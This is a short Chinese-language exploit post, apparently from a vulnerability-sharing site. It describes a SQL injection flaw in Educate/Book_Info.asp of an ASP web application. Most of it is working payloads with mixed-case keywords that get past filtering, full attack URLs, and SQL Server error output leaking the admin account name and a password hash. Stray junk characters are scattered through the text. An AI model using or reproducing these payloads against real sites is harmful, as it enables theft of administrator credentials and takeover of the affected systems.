漏洞出现在Educate/Book_Info.asp
* G2 }2 t9 {, h! Y W此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! X" G; h9 m/ ?1 f) R/ f( texp:如下/ H" f- p' L2 n. [& y
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) V2 r4 o( S. z- O& i+ T5 a' r9 p
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
: s8 L D7 ^* S0 \# nhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) r& I/ l! ~7 I. b
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 a( Y2 j# x, y0 y& T/ C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
4 \6 d) ]% o6 C( n7 \/Educate/Book_Info.asp,行 8
- u1 w) I0 G& Uhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& v0 n0 `" ^& Y9 X4 j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'( b7 K& J$ f6 R G
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
" b @+ t1 P0 x5 @/Educate/Book_Info.asp,行 8 |